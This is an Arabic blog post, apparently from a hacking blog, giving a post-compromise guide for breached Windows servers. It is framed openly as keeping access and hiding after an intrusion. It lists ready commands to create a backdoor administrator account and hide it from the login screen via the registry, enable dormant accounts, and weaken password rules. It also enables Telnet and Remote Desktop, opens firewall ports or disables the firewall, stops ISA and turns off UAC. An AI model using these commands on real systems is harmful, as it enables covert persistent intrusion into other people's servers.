خفايا الأنترنت  خفايا الأنترنت

آخر الأخبار

جاري التحميل ...

اختراق سيرفرات الوندوز

 الشرح الشامل ل اختراق سيرفرات الوندوز 

لك منا بعض الخطوات التي يعملها بعد اختراق الويندوز, بعيد عن فكرة التخريب نفسها فمنا من يحب أن يرجع إلى النظام و منا من يحب أن يستخدم النظام في أغراض الهجوم أو التخفي , إلخ,,

لهذا أحببت أن نكتب كيف من الممكن أن نستفيد من النظام اللذي تم اختراقه و كيفيه المحافظه عليه للعودة إليه مرة أخرى و كيفية استغلال ذلك الاغتراق لصالحنا.

النقاش يشمل التالي:

ضمان العودة إلى النظام مرة أخرى
التقاط البيانات و كلمات المرور
تشغيل و إطفاء الخدمات
التعامل مع برامج الحماية (Antivirus , Anti Spyware , Firewalls)
مسح الأثار
مهارات أخرى
ملاحظة: سأجعل لكل نظام موضوع مستقل لكي يكون مرجعا لنا و سأقوم بتحديث الموضوع بناء على الإضافات من الزوار مع الحفاظ على حقوق المعلومة لمن أضافها




المستخدمين و المجموعات
حسنا في حالات التدريب و الاختراق التخريبي و الاختراق للتحدي ننشئ مستخدم بأسمائنا أو بألقابنا و لكني أحيانا أحبذ أن أستخدم أحد المستخدمين الموجودين و الغير مستخدمين أو إنشاء مستخدم شبيه بأسمائهم مع فارق بسيط في التجئة و التي قد لا ينتبه إليها مدير النظام.

– إضافة مستخدم و كلمة مرور

net user USER_NAME USER_PASS  /add

مثال

net user KING sec4ar  /add

– إضافة المستخدم إلى مجموعة المدراء Administrators

net localgroup administrators USER_NAME  /add

مثال

net localgroup administrators KING  /add
– تغيّير كلمة مرور المستخدم

سيطلب منك إدخال كلمة المرور مرتين متتاليتين

ملاحظة: هناك مسافة بين اسم المستخدم و علامة النجمة “*”

net user USER_NAME  *
مثال

net user  KING  *
Type a password for the user:
Retype the password to confirm:
The command completed successfully

– لتقليل طول كلمة المرور المسموح بها

net accounts /minpwlen: length
مثال

net accounts /minpwlen: 0

هل تعلم أن بعد إضافة هذا المستخدم فإنه سيظهر في شاشة الدخول أو شاشة  الترحيب(Welcome Screen) في بداية تشغيل الويندوز؟!

– لإزالة المستخدم من شاشة الترحيب(جعله مخفي)

1. اتصل فورا بالجهاز عن طريق الـ Remote Desktop

2. إذهب إلى قائمة إبدأ أو Start و اختر Run  و اكتب regedit.exe

3. اذهب إلى المسار التالي

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\

في الجهة اليمنى, ابحث عن اسم المستخدم الذي أنشأت و انقر عليه نقرتين و غيِّر قيمته إلى صفر = 0 . فإن لم تجده !, إضغط الزر الأيمن بالفأرة و أختر ” New > DWORD Value

و أنشئ مفتاح جديد بنفس اسم المستخدم الذي تريده بالظبط

 اجعل القيمة تساوي صفر

هكذا لن يظهر

Reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v UserName /t REG_DWORD /d 0

– لتفعيل مستخدم افتراضي لكنه غير مفعل بشكل افتراضي في الويندوز

net user  USER_NAME  /acvtive:yes
مثال

net user  HelpAssistant  /acvtive:yes
الخدمات
– لتفعيل و تشغيل خدمة معينة

sc config  Service_Name start= auto
net start  Service_Name
– لعرض الخدمات الموجودة

sc query
الأن لنفعل الخدمات المهمة بالنسبة لنا

– تفعيل الـTelnet

sc config TlntSvr start= auto
net start TlntSvr
– تفعيل الـ Remote Desktop

sc config DcomLaunch start= auto
net start DcomLaunch
ملاحظة: يجب أن تفتح لهم Port  في الجدار الناري. سأشرح  ذلك لاحقا

المجلدات و الملفات
– لمشاركة مجلد أو ملف

NET SHARE sharename /USERS:numer /UNLIMITED /REMARK:"comment"
مثال

NET SHARE C:\inetpub\ftproot /UNLIMITED /REMARK:"KING-SABRI_Security4Arabs"
– تغيّر التصاريح

الحماية
– لإغلاق الجدار الناري (الجدار الناري الافتراضي مع الويندوز)

netsh firewall set opmode disable
لا أحب هذه الطريقة لأنها تظهر إنذار بذلك و يحبذ فتح المنافذ المطلوبه فقط

netsh firewall add portopening TCP  PORT_NUMBER  "Serv.Name"
مثال

netsh firewall add portopening TCP 23 "Telnet"
netsh firewall add portopening TCP 3389 "RDP"
– إغلاق الجدار الناري ISA

net stop mspfltex
– لإغلاق UAC  (خاص بـ Vista ,Win7)

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f


عن الكاتب

sohaip- hackerDZ صهيب ناصري مدون جزائري أبلغ من العمر 21 سنة أحب مشاركة أفكاري على الانترنت متخصص في مجال التقنية و أمن المعلومات أهدف الى إثراء المحتوى العربي بالمحتوى الحصري فقط!

التعليقات


اتصل بنا

إذا أعجبك محتوى مدونتنا نتمنى البقاء على تواصل دائم ، فقط قم بإدخال بريدك الإلكتروني للإشتراك في بريد المدونة السريع ليصلك جديد المدونة أولاً بأول ، كما يمكنك إرسال رساله بالضغط على الزر المجاور ...

جميع الحقوق محفوظة

خفايا الأنترنت

كل عام والأمة الأسلامية بخير

رمضان كريم